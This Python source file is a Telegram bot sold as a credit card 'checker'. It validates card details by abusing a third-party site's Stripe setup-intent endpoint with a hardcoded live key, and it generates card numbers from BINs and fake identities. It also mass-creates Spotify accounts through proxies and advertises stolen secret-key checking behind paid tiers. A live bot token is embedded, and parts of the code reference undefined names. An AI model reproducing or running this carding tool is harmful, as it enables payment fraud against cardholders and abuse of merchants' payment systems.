from aiogram import executor, types
from aiogram import Bot, Dispatcher, types
from aiogram.contrib.fsm_storage.memory import MemoryStorage
BOT_TOKEN = '8368584730:AAFwcboQzaRiS6rYQ4M_RqUWo80KMTyw2Ek'
bot = Bot(token=BOT_TOKEN, parse_mode=types.ParseMode.HTML)
storage = MemoryStorage()
dp = Dispatcher(bot, storage=storage)
from aiogram import executor, types
from aiogram.types import ReplyKeyboardMarkup, ReplyKeyboardRemove
from aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton
import time
import random
import string                                                 
import requests
import random_address

import time


PREFIX = "!/."


OWNER = ["796121550"]

OWNER_NAME = "@Jorgebarba"

CHANNEL = "https://t.me/Jorgebarba"

GROUP = "https://t.me/assemblechat"

def ok(mm):
  mg = str(mm)
  paid = open("paid.txt").read().splitlines()
  if mg in OWNER:
    user = "OWNER"
    return user
  elif mg in paid:
    user = "PAID"
    return user
  elif mg not in paid:
    user = "FREE"
    return user
  else:
    user = "FREE"
    return user



@dp.message_handler(commands=['start', 'help'], commands_prefix=PREFIX)
async def helpstr(message: types.Message):
  kk = await message.reply("<b> Hello, I'm cc checker  Bot made by Cyber Assamble</b>")
  time.sleep(2)
  seconds = time.time()
  local_time = time.ctime(seconds)
  await kk.edit_text(
    f"""<b> Hello  @{message.from_user.username} \Welcome to cc Checker bot  : {local_time} \To see all the commands send /cmds \n By the way your UserID is <code> {message.from_user.id} </code>\n Bot by: </b> <a href='https://t.me/cyberassemble'><b>Jorgebarba </b></a>""",
    disable_web_page_preview=True)

@dp.message_handler(commands=['bin'], commands_prefix=PREFIX)
async def main(message: types.Message):
  nn = await message.reply("<b>  wait i am checking y our card </b>")
  user = ok(message.from_user.id)
  cc = message.text[len('/bin '):]
  splitter = cc.split('|')
  BIN = splitter[0]
  BIN = cc[:6]
  if len(BIN) < 6:
    return await nn.edit_text('Send bin not ass')
  paid = open("black.txt").read().splitlines()

  if BIN in paid:
    return await nn.edit_text(f''' 
{BIN} <b> is blacklisted </b>
      ''')

  try:
    rem = requests.get(f"https://lookup.binlist.net/{BIN}").json()
    INFO = f'''
<b>Valid Bin</b> ✅

<b> ————Bank Details———— </b>
Bin data -»<b>{rem["scheme"]}</b>-<b>{rem["type"]}</b>-<b>{rem["brand"]}</b>
bank data -»<b>{rem["bank"]["name"]}</b>
Country -»<b>{rem["country"]["name"]} {rem["country"]["emoji"]}</b>


Checked by -» <a href="tg://user?id={message.from_user.id}">{message.from_user.first_name}</a> [{ok(message.from_user.id)}]
  '''

  except:
    INFO = f'''
<b> Invalid Bin </b> 

  '''



  await nn.edit_text(INFO)




@dp.message_handler(
  commands=['info', 'id', 'me'], commands_prefix=PREFIX
)  #------------------------------------------------------info-------------------------------------
async def delg(message: types.Message):

  if message.reply_to_message:
    user_id = message.reply_to_message.from_user.id
    is_bot = message.reply_to_message.from_user.is_bot
    username = message.reply_to_message.from_user.username
    first = message.reply_to_message.from_user.first_name

  else:
    user_id = message.from_user.id
    is_bot = message.from_user.is_bot
    username = message.from_user.username
    first = message.from_user.first_name

  await message.reply(f'''
 
<b>USER INFO</b>

<b>👱 NAME:</b><a href="tg://user?id={user_id}">{first}</a>

<b>🆔 ID:</b> <code>{user_id}</code>
<b>🌐 Username:</b> @{username}
<b>👀 User = </b> [{ok(user_id)}]
<b>🤖 IS bot = </b> {is_bot}
''')


@dp.message_handler(commands=['fake'], commands_prefix=PREFIX)
async def igfgnfokc(message: types.Message):
   import requests
   import random,string

   URL = "https://random-data-api.com/1CRN-37P1-7XBF-VEKH/users/random_user"

   response = requests.get(url = URL)

   data = response.json()

   N = 8
   ph = ''.join(random.choices(string.digits, k=N))
   phone = "98" + ph
   name1 = data["first_name"]
   name2 = data["last_name"]
   email = data["email"]
   dob = data["date_of_birth"]
   zip = data["address"]["zip_code"]
   add1 = data["address"]["street_address"]
   city = data["address"]["city"]
   state = data["address"]["state"]
   co = data["address"]["country"]

   inf = f"""
 data generated :)
 <b>
 Name  = <code> {name1} {name2} </code>
 Email = <code>{email}</code>
 phone = <code>{phone}</code>
 street = <code>{add1}  </code> 
 city = <code>{city}</code>
 state = <code>{state}</code>
 country = <code>{co}</code>
 zip code = <code>{zip}</code>
 DOB = <code>{dob}</code>

 <b>generated by</b> -» <a href="tg://user?id={message.from_user.id}">{message.from_user.first_name}</a>
 </b>
   """


   return await message.reply(inf)

def getRandomString(length): #Letters and numbers
    pool=string.ascii_lowercase+string.digits
    return "".join(random.choice(pool) for i in range(length))

def getRandomText(length): #Chars only
    return "".join(random.choice(string.ascii_lowercase) for i in range(length))

def generate(proxies):
    nick = getRandomText(8)
    passw = getRandomString(12)
    email = nick+"@"+"gmail"+".com"

    headers={"Accept-Encoding": "gzip",
             "Accept-Language": "en-US",
             "App-Platform": "Android",
             "Connection": "Keep-Alive",
             "Content-Type": "application/x-www-form-urlencoded",
             "Host": "spclient.wg.spotify.com",
             "User-Agent": "Spotify/8.6.72 Android/29 (SM-N976N)",
             "Spotify-App-Version": "8.6.72",
             "X-Client-Id": getRandomString(32)}

    payload = {"creation_point": "client_mobile",
            "gender": "male" if random.randint(0, 1) else "female",
            "birth_year": random.randint(1990, 2000),
            "displayname": nick,
            "iagree": "true",
            "birth_month": random.randint(1, 11),
            "password_repeat": passw,
            "password": passw,
            "key": "142b583129b2df829de3656f9eb484e6",
            "platform": "Android-ARM",
            "email": email,
            "birth_day": random.randint(1, 20)}

    r = requests.post('https://spclient.wg.spotify.com/signup/public/v1/account/', headers=headers, data=payload,proxies=proxies)
    print(r.json())

    if r.status_code==200:
        if r.json()['status']==1:
          text = f"""
Auto Spotify Created! ✅
[+] isPremium-»  False
[+] Email-» <b>{email}</b>
[+] Password-»<code>{passw}</code>"""

          return (text)
        else:
            #Details available in r.json()["errors"]
            #print(r.json()["errors"])
            return (False, "Could not create the account, some errors occurred")
    else:
        return (False, "Could not load the page. Response code: "+ str(r.status_code))



@dp.message_handler(commands=['cmd', 'cmds', 'command', 'commands'],
                    commands_prefix=PREFIX)
async def process_cart(message: types.Message):
  button1 = InlineKeyboardButton(text="💳 Checker Gates 💳",callback_data="back")
  button2 = InlineKeyboardButton(text="🔍Tools🔍",callback_data="other")
  button3 = InlineKeyboardButton(text="🔑Get-access🔑", callback_data="buy")
  button4 = InlineKeyboardButton(text="🔚", callback_data="close")

  keyboard_inline = InlineKeyboardMarkup().add(button1).add(button2).add(button3).add(button4)

  await message.reply(f"""
<b>
Hello, it seems to me that you are interested in my commands, you can explore by pressing any of the buttons
<b>User type = {message.from_user.first_name}</b> ({ok(message.from_user.id)}) 
Bot made by: <a href='{CHANNEL}'>{OWNER_NAME}</a> </b>""",
                      reply_markup=keyboard_inline,
                      disable_web_page_preview=True)





@dp.message_handler(commands=['spotify'], commands_prefix=PREFIX)
async def cdgh(message: types.Message):
  proxies = {
  "http": "http://gate.proxiware.com:2000",
  "https": "http://gate.proxiware.com:2000"
}


  return await message.reply(generate(proxies))
@dp.message_handler(commands=['pp','chk','sl' , 'ss'], commands_prefix=PREFIX)
async def chk(message: types.Message):
  toc = time.perf_counter()
  kk = await message.reply('<b>wait i am checking y our card </b>')
  await kk.edit_text(f"<b>□□□□□</b>")
  ug = message.chat.type
  m = message.from_user.id
  kc = ok(m)
  if "private" in ug:
    if "OWNER" in kc or "PAID" in kc:
      pass

    else:
      button3 = InlineKeyboardButton(text="Join",
                                     url="https://t.me/cyberassemble")
      keyboard_inline = InlineKeyboardMarkup().add(button3)
      return await kk.edit_text(
        "<b> ❌ chats not allowed ❌\nTo use me for free  Join  https://t.me/cyberassemble </b>",
        reply_markup=keyboard_inline,
        disable_web_page_preview=True)
    pass
  elif "supergroup" in ug or "group" in ug:
    guid = f'{message.chat.id}'

    paid = open("group.txt").read().splitlines()
    if guid in paid:

      try:
        if "OWNER" in kc or "PAID" in kc:
          pass
        else:
          await dp.throttle('chk', rate=ANTISPAM)
      except Throttled:
        keyboard_markup = types.InlineKeyboardMarkup(row_width=3)
        btns = types.InlineKeyboardButton("Take Preamium ",
                                          url="https://t.me/cyberassemble")
        button2 = InlineKeyboardButton(text="close", callback_data="close")
        keyboard_markup.row(btns, button2)
        return await kk.edit_text(
          """<b> Sorry Request Bloced Due To Antispam  Try Again After Some Time</b>""",
          reply_markup=keyboard_markup,
          disable_web_page_preview=True)

    else:
      button3 = InlineKeyboardButton(text="Join",
                                     url="")
      keyboard_inline = InlineKeyboardMarkup().add(button3)
      return await kk.edit_text(
        f"<b> ❌ chats not allowed ❌\nTo use me for free  Join  https://t.me/cyberassemble </b>",
        reply_markup=keyboard_inline,
        disable_web_page_preview=True)
  else:
    button3 = InlineKeyboardButton(text="Join",
                                   url="https://t.me/cyberassemble")
    keyboard_inline = InlineKeyboardMarkup().add(button3)
    return await kk.edit_text(
      f"<b> ❌ chats not allowed ❌\nTo use me for free  Join   </b>",
      reply_markup=keyboard_inline,
      disable_web_page_preview=True)
  await kk.edit_text(f"<b>■□□□□</b>")
  if message.reply_to_message:
    cc = message.reply_to_message.text

  else:
    cc = message.text

  if len(cc) == 0:
    return await kk.edit_text("<b>No Card to chk</b>")

  cards = []
  x = cc
  input = re.findall(r"[0-9]+", x)
  if not input or len(input) < 3:
    return await kk.edit_text("no cc found")
  if len(input) == 3:
    cc = input[0]
    if len(input[1]) == 3:
      mes = input[2][:2]
      ano = input[2][2:]
      cvv = input[1]
    else:
      mes = input[1][:2]
      ano = input[1][2:]
      cvv = input[2]
  else:
    cc = input[0]
    if len(input[1]) == 3:
      mes = input[2]
      ano = input[3]
      cvv = input[1]
    else:
      mes = input[1]
      ano = input[2]
      cvv = input[3]
    if len(mes) == 2 and (mes > '12' or mes < '01'):
      ano1 = mes
      mes = ano
      ano = ano1
  if cc and not checkLuhn(cc): pass
  await kk.edit_text(f"<b>■■□□□</b>")
  if (cc, mes, ano, cvv):
    cards.append([cc, mes, ano, cvv])

  BIN = cc[:6]


  rem = requests.get(f"https://lookup.binlist.net/{BIN}").json()
  try:
    bnk = rem["bank"]["name"]
    scheme = rem["scheme"]
    type = rem["type"]
    brand = rem["brand"]
    countery = rem["country"]["name"]
    emojis = rem["country"]["emoji"]
  except:
    bnk = ""
    scheme = ""
    type = ""
    brand = ""
    countery = ""
    emojis = ""




  url1 = "https://www.afscv.org/_public/Components/Commerce/Configuration/PaymentMethods/Methods/CreditCard/Gateways/Stripe/setup_intent.php"
  data1 = """{"payment_method_id":6}"""    

  r1 = requests.post(url1, data=data1)
  r1j = r1.json()
  try:
      seti = r1j["id"]
      seti_s = r1j["client_secret"]    
  except:
      cm = r1j["error"]["code"]
      tic = time.perf_counter()
      return await kk.edit_text(f"""
Card ⇾<code>{cc}|{mes}|{ano}|{cvv}</code>
Response ⇾<b> {cm} 🚫</b>
gate ⇾<b>stripe Auth </b>
<b>———»Details«———</b>
 Bin info   -»<b>{scheme}</b>-<b>{type}</b>-<b>{brand}</b>
Country name  -»<b>{countery} {emojis}</b>
bank info -»<b>{bnk}</b>
<b>———-»Info«-———-</b>
Proxy ⇾Live! ✅
 Time  ⇾<b>{toc - tic:0.4f}</b>'s
 check by ⇾<a href="tg://user?id={message.from_user.id}">{message.from_user.first_name}</a> [{ok(message.from_user.id)}]
Bot by ⇾<a href="tg://user?id=796121550"><b>RAS</b></a>""",
                            disable_web_page_preview=True)

  url2 = f"https://api.stripe.com/v1/setup_intents/{seti}/confirm"
  data2 = f"payment_method_data[type]=card&payment_method_data[billing_details][name]=+Sam+smith&payment_method_data[card][number]={cc}&payment_method_data[card][cvc]={cvv}&payment_method_data[card][exp_month]={mes}&payment_method_data[card][exp_year]={ano}&payment_method_data[guid]=d2f1afe2-277e-40da-8408-5ef25ae9b1a1e88e53&payment_method_data[muid]=f197fbad-91a1-4baf-b100-b4df1f809487c204b3&payment_method_data[sid]=7f5c025b-8e69-4ace-819e-e463863c40bbb0d00e&payment_method_data[pasted_fields]=number&payment_method_data[payment_user_agent]=stripe.js%2Fc8b8c6168%3B+stripe-js-v3%2Fc8b8c6168&payment_method_data[time_on_page]=501203&expected_payment_method_type=card&use_stripe_sdk=true&key=pk_live_51F0EDvB1Ma5SOvilMZe4TNFodNsWG1JYYPHSGiDvRYkKEHFRfxWZx540KUSbS23ypfSNvDJyq06kakMaPw5QGhMX00VdgIt50x&client_secret={seti_s}"

  r2 = requests.post(url2, data=data2)
  r2j = r2.json()

  r2t = r2.text

  if "succeeded" in r2t:
      tic = time.perf_counter()
      return await kk.edit_text(f"""
 Card ⇾<code>{cc}|{mes}|{ano}|{cvv}</code>
 Response ⇾<b> Approved ✅</b>
 gate ⇾<b>stripe Auth </b>
<b>———»Details«———</b>
 Bin info   -»<b>{scheme}</b>-<b>{type}</b>-<b>{brand}</b>
 Country name  -»<b>{countery} {emojis}</b>
 bank info -»<b>{bnk}</b>
<b>———-»Info«-———-</b>
 Proxy ⇾Live! ✅
 Time  ⇾<b>{toc - tic:0.4f}</b>'s
 check by ⇾<a href="tg://user?id={message.from_user.id}">{message.from_user.first_name}</a> [{ok(message.from_user.id)}]
 Bot by ⇾<a href="tg://user?id=796121550"><b>RAS</b></a>""",
                            disable_web_page_preview=True)
  elif "incorrect_number" in r2t:
      Inc = r2j["error"]["code"]
      tic = time.perf_counter()
      return await kk.edit_text(f"""
 Card ⇾<code>{cc}|{mes}|{ano}|{cvv}</code>
 Response ⇾<b> {Inc} 🚫</b>
 gate ⇾<b>stripe Auth </b>
<b>———»Details«———</b>
 Bin    -»<b>{scheme}</b>-<b>{type}</b>-<b>{brand}</b>
 Country name  -»<b>{countery} {emojis}</b>
 bank info -»<b>{bnk}</b>
<b>———-»Info«-———-</b>
 Proxy ⇾Live! ✅
 Time  ⇾<b>{toc - tic:0.4f}</b>'s
 check by ⇾<a href="tg://user?id={message.from_user.id}">{message.from_user.first_name}</a> [{ok(message.from_user.id)}]
 Bot by ⇾<a href="tg://user?id=796121550"><b>RAS</b></a>""",
                            disable_web_page_preview=True)
  elif "error" in r2t:
      try:
          err = r2j["error"]["decline_code"]
          tic = time.perf_counter()
          return await kk.edit_text(f"""
 Card ⇾ <code>{cc}|{mes}|{ano}|{cvv}</code>
 Response ⇾ <b> {err} 🚫</b>
 gate ⇾ <b>Stripe Auth </b>
<b>———⇾Details⇾———</b>
Bin info ⇾<b>{scheme}</b>-<b>{type}</b>-<b>{brand}</b>
 Country name   ⇾<b>{countery} {emojis}</b>
 bank info⇾<b>{bnk}</b>
<b>———⇾Info⇾———-</b>
 Proxy ⇾ Live! ✅
 Time  ⇾ <b>{toc - tic:0.4f}</b>'s
 check by ⇾ <a href="tg://user?id={message.from_user.id}">{message.from_user.first_name}</a> [{ok(message.from_user.id)}]
 Bot by ⇾ <a href="tg://user?id=796121550"><b>RAS</b></a>""",
                            disable_web_page_preview=True)
      except:
          kd = r2j["error"]["code"]
          tic = time.perf_counter()
      return await kk.edit_text(f"""
 Card ⇾ <code>{cc}|{mes}|{ano}|{cvv}</code>
 Response ⇾ <b> {kd} 🚫</b>
 gate ⇾ <b>stripe Auth </b>
<b>———⇾Details⇾———</b>
  Bin info   ⇾<b>{scheme}</b>-<b>{type}</b>-<b>{brand}</b>
 Country name  ⇾<b>{countery} {emojis}</b>
 bank ⇾<b>{bnk}</b>
<b>———⇾Info⇾———-</b>
 Proxy ⇾ Live! ✅
 Time  ⇾ <b>{toc - tic:0.4f}</b>'s
 check by ⇾ <a href="tg://user?id={message.from_user.id}">{message.from_user.first_name}</a> [{ok(message.from_user.id)}]
 Bot by ⇾ <a href="tg://user?id=796121550"><b>RAS</b></a>""",
                            disable_web_page_preview=True)
  else:
      tic = time.perf_counter()
      return await kk.edit_text(f"""
 Card ⇾<code>{cc}|{mes}|{ano}|{cvv}</code>
 Response ⇾ <b> Bin   not Found 🚫</b>
 gate ⇾<b>stripe Auth </b>
<b>———»Details«———</b>
 Bin info  ⇾
Country name  ⇾
bank info⇾
<b>———-»Info«-———-</b>
 Proxy ⇾Live! ✅
 Time  ⇾<b>{toc - tic:0.4f}</b>'s
 check by ⇾<a href="tg://user?id={message.from_user.id}">{message.from_user.first_name}</a> [{ok(message.from_user.id)}]
 Bot by ⇾<a href="tg://user?id=796121550"><b>RAS</b></a>""",
                            disable_web_page_preview=True)



@dp.message_handler(
  commands=['plan', 'plans', 'buy'], commands_prefix=PREFIX
)  #------------------------------------------------------buy-------------------------------------
async def infobbkc(message: types.Message):

  m = message.from_user.id
  kc = ok(m)
  button2 = InlineKeyboardButton(text="hide", callback_data="hide")

  keyboard_inline = InlineKeyboardMarkup().add(button2)
  if "OWNER" in kc:

    return await message.reply(''' 
how can a developer buy his own bot :)
        ''',
                               reply_markup=keyboard_inline)
  elif "PAID" in kc:
    return await message.reply(f''' 
<a href="tg://user?id={m}">{message.from_user.first_name}</a> no need to buy you are alredy a premium member
''',
                               reply_markup=keyboard_inline)
  else:

    button1 = InlineKeyboardButton(text="plans", callback_data="buy")
    button2 = InlineKeyboardButton(text="hide", callback_data="hide")

    keyboard_inline = InlineKeyboardMarkup().add(button1).add(button2)
    return await message.reply(
      """<b> click the below button to see my plans </b> """,
      reply_markup=keyboard_inline,
      disable_web_page_preview=True)









def find_between(data, first, last):
  try:
    start = data.index(first) + len(first)
    end = data.index(last, start)
    return data[start:end]
  except ValueError:
    return None
N = 8
ph = ''.join(random.choices(string.digits, k=N))
phone = "98" + ph

mm = random_address.real_random_address_by_postal_code('32409')

address1 = mm["address1"]
state = mm["state"]


email_length = 9
characters = string.ascii_letters + string.ascii_uppercase
email = ""
for index in range(email_length):
  email = email + random.choice(characters)
first = email
last = first
mail = f"{email}@gmail.com"

def checkLuhn(cardNo):

  nDigits = len(cardNo)
  nSum = 0
  isSecond = False

  for i in range(nDigits - 1, -1, -1):
    d = ord(cardNo[i]) - ord('0')

    if (isSecond == True):
      d = d * 2

    # We add two digits to handle
    # cases that make two digits after
    # doubling
    nSum += d // 10
    nSum += d % 10

    isSecond = not isSecond

  if (nSum % 10 == 0):
    return True
  else:
    return False


def cc_gen(
  cc,
  mes='x',
  ano='x',
  cvv='x',
  amount='x',
):
  if amount != 'x':
    amount = int(amount)
  else:
    amount = 15
  genrated = 0
  ccs = []
  while (genrated < amount):
    genrated += 1
    s = "0123456789"
    l = list(s)
    random.shuffle(l)
    result = ''.join(l)
    result = cc + result
    if cc[0] == "3":
      ccgen = result[0:15]
    else:
      ccgen = result[0:16]
    if mes == 'x':
      mesgen = random.randint(1, 12)
      if len(str(mesgen)) == 1:
        mesgen = "0" + str(mesgen)
    else:
      mesgen = mes
    if ano == 'x':
      anogen = random.randint(2021, 2029)
    else:
      anogen = ano
    if cvv == 'x':
      if cc[0] == "3":
        cvvgen = random.randint(1000, 9999)
      else:
        cvvgen = random.randint(100, 999)
    else:
      cvvgen = cvv
    # if not x: continue
    lista = "<code>" + str(ccgen) + "|" + str(mesgen) + "|" + str(
      anogen) + "|" + str(cvvgen) + "</code>"
    ccs.append(lista)
  return ccs


proxies = {
  'http': 'http://us.proxiware.com:2000',
  'https': 'http://us.proxiware.com:2000'
}


def find_between(data, first, last):
  try:
    start = data.index(first) + len(first)
    end = data.index(last, start)
    return data[start:end]
  except ValueError:
    return None




@dp.callback_query_handler(text=["free", "paid", "buy", "close", "other", "back", "hide", "other back"])
async def process_cart(call: types.CallbackQuery):
  if call.data == "free":
    button1 = InlineKeyboardButton(text="💲free gates💲", callback_data="paid")
    button3 = InlineKeyboardButton(text="🔙", callback_data="back")
    button4 = InlineKeyboardButton(text="🔚", callback_data="close")

    keyboard_inline = InlineKeyboardMarkup().add(button1).add(button3, button4)

    await call.message.edit_text("""
<b>
➣ 3D Lookup : OFF

➣ Stripe Auth V4 : /chk""",
                                 reply_markup=keyboard_inline,
                                 disable_web_page_preview=True)






  elif call.data == "paid":

    button1 = InlineKeyboardButton(text="💱Paid gates💱", callback_data="free")
    button3 = InlineKeyboardButton(text="🔙", callback_data="back")
    button4 = InlineKeyboardButton(text="🔚", callback_data="close")
    keyboard_inline = InlineKeyboardMarkup().add(button1).add(button3, button4)

    await call.message.edit_text("""<b>
➣ Braintree [Non 3D] : OFF

➣ Usaepay : OFF

➣ BluePay [AVS] : OFF

➣ PayEzzy : OFF

➣ PayFlow : OFF

➣ Recurly : OFF

➣ Stripe Mass Check : OFF

➣ Stripe Charge 1€ : OFF

➣ Stripe Charge 1$ : OFF

➣ Stripe Charge 20$ : OFF

➣ Stripe Charge 0.5$ + Refund : OFF

➣ Stripe Charge 1$ + Refund : OFF

➣ Stripe Charge 5$ + Refund : OFF

➣ Stripe Charge 10$ + Refund : OFF

➣ Stripe Charge 300$ : OFF </b>""",reply_markup=keyboard_inline, disable_web_page_preview=True)

  elif call.data == "buy":
    button1 = InlineKeyboardButton(text="🔚", callback_data="hide")
    button2 = InlineKeyboardButton(text="🔙", callback_data="buy")
    keyboard_inline = InlineKeyboardMarkup().add(button2).add(button1)

    text = f"""
contact @Jorgebarba
"""

    await call.message.edit_text(text,reply_markup=keyboard_inline)
  elif call.data == "close":
    try:
      return await call.message.delete()
    except:
       await call.message.edit_text("hidden")
  elif call.data == "back":
    button1 = InlineKeyboardButton(text="💱Paid gates💱", callback_data="free")
    button2 = InlineKeyboardButton(text="💲Free gates💲", callback_data="paid")
    button3 = InlineKeyboardButton(text="🔙", callback_data="other back")
    button4 = InlineKeyboardButton(text="🔚", callback_data="close")
    keyboard_inline = InlineKeyboardMarkup().add(button1).add(button2).add(
      button3, button4)

    await call.message.edit_text(f"""
    <b>
Hello, it seems to me that you are interested in my commands, you can explore by pressing any of the buttons
<b>User type = {call.message.reply_to_message.from_user.full_name}</b> ({ok(call.message.reply_to_message.from_user.id)})
Bot made by: <a href='{CHANNEL}'><b>{OWNER}</b>  </a> </b>""",reply_markup=keyboard_inline,disable_web_page_preview=True)


  elif call.data == "other":


    button2 = InlineKeyboardButton(text="🔙", callback_data="other back")
    button3 = InlineKeyboardButton(text="🔚", callback_data="close")
    keyboard_inline = InlineKeyboardMarkup().add(button2, button3)

    await call.message.edit_text(f"""
<b>
🔥 /sk sk_live_xxx to check sk keys (with balance)

🔥 /bin xxxxxx  to check bin 

🔥 /src cc scraper

🔥 /fake fake address gen

🔥 /gen cc gen
</b>
Bot made by: <a href='{CHANNEL}'><b>{OWNER}</b>  </a> """,reply_markup=keyboard_inline,disable_web_page_preview=True)

  elif call.data == "hide":
    try:
      return await call.message.delete()
    except:
       await call.message.edit_text("hidden")


  elif call.data == "other back":
    button1 = InlineKeyboardButton(text="💳 Checker Gates 💳",callback_data="back")
    button2 = InlineKeyboardButton(text="🔍Tools 🔍",callback_data="other")
    button3 = InlineKeyboardButton(text="🔑Get-access🔑", callback_data="buy")
    button4 = InlineKeyboardButton(text="🔚", callback_data="close")

    keyboard_inline = InlineKeyboardMarkup().add(button1).add(button2).add(button3).add(button4)

    await call.message.edit_text(f"""
      <b>
Hello, it seems to me that you are interested in my commands, you can explore by pressing any of the buttons
<b>User type = {call.message.reply_to_message.from_user.full_name}</b> ({ok(call.message.reply_to_message.from_user.id)})
Bot made by: <a href='{CHANNEL}'><b>{OWNER}</b>  </a> </b>""",
                                 reply_markup=keyboard_inline,
                                 disable_web_page_preview=True)



#=======================================================commands=======================================================================


#=======================================================commands=======================================================================


def new_func2(r,cc,cvv,mes,ano,):
    url1 = "https://www.afscv.org/_public/Components/Commerce/Configuration/PaymentMethods/Methods/CreditCard/Gateways/Stripe/setup_intent.php"
    data1 = """{"payment_method_id":6}"""    

    r1 = r.post(url1, data=data1)
    r1j = r1.json()
    try:
        seti = r1j["id"]
        seti_s = r1j["client_secret"]    
    except:
        cm = r1j["error"]["code"]
        return (f"<code>{cc}|{mes}|{ano}|{cvv}</code>\n <b>{cm}🚫</b>\n")

    url2 = f"https://api.stripe.com/v1/setup_intents/{seti}/confirm"
    data2 = f"payment_method_data[type]=card&payment_method_data[billing_details][name]=+Sam+smith&payment_method_data[card][number]={cc}&payment_method_data[card][cvc]={cvv}&payment_method_data[card][exp_month]={mes}&payment_method_data[card][exp_year]={ano}&payment_method_data[guid]=d2f1afe2-277e-40da-8408-5ef25ae9b1a1e88e53&payment_method_data[muid]=f197fbad-91a1-4baf-b100-b4df1f809487c204b3&payment_method_data[sid]=7f5c025b-8e69-4ace-819e-e463863c40bbb0d00e&payment_method_data[pasted_fields]=number&payment_method_data[payment_user_agent]=stripe.js%2Fc8b8c6168%3B+stripe-js-v3%2Fc8b8c6168&payment_method_data[time_on_page]=501203&expected_payment_method_type=card&use_stripe_sdk=true&key=pk_live_51F0EDvB1Ma5SOvilMZe4TNFodNsWG1JYYPHSGiDvRYkKEHFRfxWZx540KUSbS23ypfSNvDJyq06kakMaPw5QGhMX00VdgIt50x&client_secret={seti_s}"

    r2 = r.post(url2, data=data2)
    r2j = r2.json()

    r2t = r2.text
    try:

      if "succeeded" in r2t:
          return (f"<code>{cc}|{mes}|{ano}|{cvv}</code>\n <b>Auth Approved ✅ </b>\n")
      elif "incorrect_number" in r2t:
          Inc = r2j["error"]["code"]
          return (f"<code>{cc}|{mes}|{ano}|{cvv}</code>\n <b> {Inc}</b>\n")
      elif "message" in r2t:
          try:
              err = r2j["error"]["decline_code"]
              return (f"<code>{cc}|{mes}|{ano}|{cvv}</code>\n <b>{err}</b>\n")
          except:
              kd = r2j["error"]["code"]
              return (f"<code>{cc}|{mes}|{ano}|{cvv}</code>\n <b>{kd} </b>\n")

      else:
          return (f"<code>{cc}|{mes}|{ano}|{cvv}</code>\n <b>Error Checking</b>\n")
    except:
      return (f"<code>{cc}|{mes}|{ano}|{cvv}</code>\n <b>Error Checking</b>\n")

if __name__ == '__main__':
    executor.start_polling(dp, skip_updates=True)
